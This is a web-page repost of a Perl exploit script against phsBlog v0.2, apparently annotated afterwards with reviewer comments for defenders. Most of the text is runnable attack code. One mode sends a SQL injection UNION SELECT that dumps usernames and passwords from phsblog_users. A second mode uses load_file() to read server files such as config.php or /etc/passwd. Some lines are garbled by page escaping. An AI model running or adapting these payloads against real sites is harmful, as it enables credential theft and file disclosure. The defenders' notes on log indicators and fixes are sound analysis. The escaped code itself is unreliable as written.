phsBlog 0.2 Bypass SQL Injection Filtering Exploit

2023-12-04 0 322

#!/usr/bin/perl

#—————————————————————-

#

#Script : PhsBlog v0.2

#

#Type : Bypass Sql injection Filtering Exploit

#

#Method : GET

#

#Risk : High

#

#—————————————————————-

#

#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

#

#My Official Website : HTTP://FEREIDANI.IR

#

#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

#

#—————————————————————-

#

#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR

#

#—————————————————————-

#

#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip

#

#—————————————————————-

#

# Tnx : God

#

# HTTP://IRCRASH.COM

#

#—————————————————————-

use LWP;

use HTTP::Request;

use Getopt::Long;

# Product name and version shown in the banners. It is a package global
# (the file has no `use strict`), read by header() and by the menu text
# printed at the bottom of the script.
$scriptname="PhsBlog v0.2";

# header: writes the credit banner to STDOUT. The banner interpolates the
# package global $scriptname; no trailing newline follows the last rule.
sub header {
    my $banner = "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************";

    print $banner;
}

# usage: writes the one-line invocation hint to STDOUT. $0 interpolates to
# the path the script was started with.
sub usage {
    my $help_text = "

* Usage : perl $0 http://Example/

****************************************************

";

    print $help_text;
}

# Base URL of the phsBlog installation, taken from the first command-line
# argument and stored in a package global that xpl1() and xpl2() read.
$url = ($ARGV[0]);

# No argument given: print the banner and the usage hint, then stop.
if(!$url)

{

header();

usage();

exit;

}

# NOTE(review): the two patterns below look garbled by the page's escaping
# (doubled backslashes) and are kept verbatim. Judging by the replacement
# values, the intent is to append "/" and to prepend "http://" when the
# argument lacks them -- confirm against an original copy of the script.
if($url !~ /\\//){$url = $url."/";}

if($url !~ /http:\\/\\//){$url = "http://".$url;}

# xpl1 ("Mod 1" in the menu): sends one HTTP request to index.php with a
# UNION SELECT placed in the sql_cid query parameter, then cuts the username
# and password columns of phsblog_users out of the response body and prints
# them. Takes no arguments; reads the package global $url.
#
# Reviewer notes for defenders:
#  - The request implies that sql_cid reaches a SQL statement as text.
#    Binding it as a query parameter (or casting it to an integer) removes
#    the injection point. The page title describes this as a bypass of the
#    application's own input filter; that filter is not shown here.
#  - Log indicators visible in this listing: "union select", "concat(0x" and
#    a trailing "/*" inside sql_cid, the Referer "IRCRASH.COM", the fixed
#    User-Agent string below, and a POST whose body is empty.
#  - NOTE(review): the backslash + typographic-quote sequences in this sub
#    are page-escaping artifacts; the lines are kept verbatim.
sub xpl1()

{

#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)

# The hex literals are output markers: 0x4c6f67696e3a is "Login:",
# 0x3c656e64757365723e is "<enduser>", 0x0d0a50617373776f72643a is CRLF plus
# "Password:", and 0x3c656e64706173733e is "<endpass>". They match the
# split() patterns used on the response further down.
$vul = "/index.php?sql_cid=999\’union select 0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12 from phsblog_users/*";

$requestpage = $url.$vul;

# The request method is POST although the header comment says "Method : GET";
# the injected value travels in the URL query string either way.
my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( \’Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9\’ );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type(\’application/x-www-form-urlencoded\’);

# $contlen and $poststring are not assigned anywhere in this listing, so the
# Content-Length header and the request body are set from undefined values.
$req->header("content-length" => $contlen);

$req->content($poststring);

$response = $ua->request($req);

$content = $response->content;

# The response headers are captured here but not used again in this sub.
$header = $response->headers_as_string();

# Keep the text between "Login:" and "<enduser>" as $name. @name[1] is a
# one-element array slice used where $name[1] would normally be written.
@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0];

# Same extraction for the text between "Password:" and "<endpass>".
@password = split(/Password:/,$content);

$password = @password[1];

@password = split(/<endpass>/,$password);

$password = @password[0];

# Neither marker produced a value: report failure and end the whole script.
if(!$name && !$password)

{

print "\\n\\n";

print "!Exploit failed ! :(\\n\\n";

exit;

}

# Prints whatever the username and password columns hold; the page does not
# show whether phsBlog stores the password hashed or in clear text.
print "\\n Username: ".$name."\\n\\n";

print " Password: " .$password."\\n\\n";

}

#XPL2

# xpl2 ("Mod 2" in the menu): asks for a server-side file path on STDIN,
# sends one HTTP request whose sid query parameter carries a UNION SELECT
# wrapping MySQL load_file() around that path, and writes the text found
# between the "Login:" and "<enduser>" markers of the response to source.txt.
# Takes no arguments; reads the package global $url.
#
# Reviewer notes for defenders:
#  - load_file() only returns data when the application's database account
#    holds the FILE privilege and the path is permitted by secure_file_priv;
#    the query also selects from mysql.user. A least-privilege account (no
#    FILE, no access to the mysql schema) blocks this mode even while the
#    injection is unpatched, which fits the banner's own remark that it does
#    "not work in many servers".
#  - Log indicators visible in this listing: "show=pickup" with a sid value
#    containing "union select", "load_file(" and "mysql.user", plus the same
#    Referer and User-Agent as xpl1.
#  - NOTE(review): the backslash + typographic-quote sequences in this sub
#    are page-escaping artifacts; the lines are kept verbatim.
sub xpl2()

{

print "\\n Example For File Address : /home/user/public_html/config.php\\n Or /etc/passwd";

print "\\n Enter File Address :";

# The path is read from STDIN and interpolated into the query string below.
$fil3 = <stdin>;

#index.php?sql_cid=999\’union select 0,1,2,3,4,concat(0x4c6f67696e3a,load_file(\’$fil3\’),0x3c656e64757365723e),6,7,8,9,10,11,12 from phsblog_users/*

# 0x4c6f67696e3a is "Login:" and 0x3c656e64757365723e is "<enduser>"; they
# delimit the file content in the response for the split() calls below.
$vul = "?show=pickup&sid=99999\’ union select 0,concat(0x4c6f67696e3a,load_file(\’$fil3\’),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13 from mysql.user/*";

$requestpage = $url.$vul;

# POST request with the injected value in the URL query string.
my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( \’Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9\’ );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type(\’application/x-www-form-urlencoded\’);

# $contlen and $poststring are not assigned anywhere in this listing, so the
# Content-Length header and the request body are set from undefined values.
$req->header("content-length" => $contlen);

$req->content($poststring);

$response = $ua->request($req);

$content = $response->content;

# The response headers are captured here but not used again in this sub.
$header = $response->headers_as_string();

# Keep the text between "Login:" and "<enduser>" as $name.
@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0];

# $password is never assigned in this sub; it is a package global that only
# xpl1() sets, so the test depends on $name alone when xpl2() runs by itself.
if(!$name && !$password)

{

print "\\n\\n";

print "!Exploit failed ! :(\\n\\n";

exit;

}

# Two-argument open on a bareword handle with no error check. `source` is a
# bareword that evaluates to the string "source", so the output file is
# source.txt in the current directory, overwritten on each run.
open (FILE, ">".source.".txt");

print FILE $name;

close (FILE);

print " File Save In source.txt\\n";

print "";

}

#XPL2 END

#Starting;

# Entry point: prints the banner together with the two-mode menu, reads the
# chosen mode from STDIN and dispatches to xpl1() or xpl2().
print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************

* Mod Options : *

* Mod 1 : Find Script username and password *

* Mod 2 : File Disclosure(not work in many servers)*

****************************************************";

print "\\n \\n Enter Mod : ";

# The raw STDIN line (trailing newline included) is kept as the mode value.
$mod=<stdin>;

# The comparisons use numeric ==, so any input that numifies to 1 or 2 is
# accepted. An unknown mode only prints a message; the script then falls
# through the two tests below without calling either sub.
if ($mod=="1" or $mod=="2") { print "\\n Exploiting ………….. \\n"; } else { print "\\n Unknown Mod ! \\n Exploit Failed !"; };

if ($mod=="1") { xpl1(); };

if ($mod=="2") { xpl2(); };
